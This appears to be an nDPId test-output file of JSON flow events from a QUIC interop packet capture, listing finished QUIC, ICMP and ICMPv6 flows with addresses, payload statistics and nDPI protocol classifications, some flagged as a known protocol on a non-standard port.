+00868{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434652,"flow_last_seen":1603816434749,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":45852,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00864{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434707,"flow_last_seen":1603816435089,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2534,"flow_avg_l4_payload_len":633,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":44924,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00738{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434586,"flow_last_seen":1603816434586,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":39624,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434641,"flow_last_seen":1603816435089,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":42456,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434776,"flow_last_seen":1603816434776,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":43735,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434512,"flow_last_seen":1603816434512,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":47010,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434886,"flow_last_seen":1603816435111,"flow_idle_time":140000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":1222,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"133.242.206.244","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434606,"flow_last_seen":1603816444569,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":49658,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434519,"flow_last_seen":1603816434551,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1255,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":60346,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434582,"flow_last_seen":1603816434582,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":51887,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434743,"flow_last_seen":1603816444721,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":42468,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}} +00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434721,"flow_last_seen":1603816444586,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":50705,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}} 
+00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434756,"flow_last_seen":1603816444721,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":53402,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434670,"flow_last_seen":1603816435086,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":44619,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434606,"flow_last_seen":1603816434606,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":41587,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00854{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434677,"flow_last_seen":1603816434677,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":44243,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816435054,"flow_last_seen":1603816435054,"flow_idle_time":140000,"flow_min_l4_payload_len":79,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":79,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1603816435020,"flow_last_seen":1603816435194,"flow_idle_time":140000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00861{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434685,"flow_last_seen":1603816434779,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1279,"flow_avg_l4_payload_len":639,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":53760,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": 
{"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00872{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434784,"flow_last_seen":1603816434822,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":44605,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434699,"flow_last_seen":1603816434699,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":54570,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434661,"flow_last_seen":1603816434997,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2558,"flow_avg_l4_payload_len":639,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":53791,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}} +00871{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434602,"flow_last_seen":1603816434650,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1267,"flow_avg_l4_payload_len":633,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":60983,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434585,"flow_last_seen":1603816434765,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":49151,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434642,"flow_last_seen":1603816434642,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
+00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434509,"flow_last_seen":1603816434509,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":34442,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434518,"flow_last_seen":1603816434566,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1267,"flow_avg_l4_payload_len":633,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":48707,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00859{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434535,"flow_last_seen":1603816444528,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":9856,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":32957,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00873{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434599,"flow_last_seen":1603816434725,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1283,"flow_avg_l4_payload_len":641,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":52080,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00872{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434764,"flow_last_seen":1603816434897,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":53140,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434729,"flow_last_seen":1603816434729,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":56073,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434818,"flow_last_seen":1603816434818,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"18.189.84.245","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434772,"flow_last_seen":1603816434831,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":2480,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:19f0:4:34::1","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
+00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434680,"flow_last_seen":1603816434845,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":2480,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434670,"flow_last_seen":1603816444524,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":9856,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":46242,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
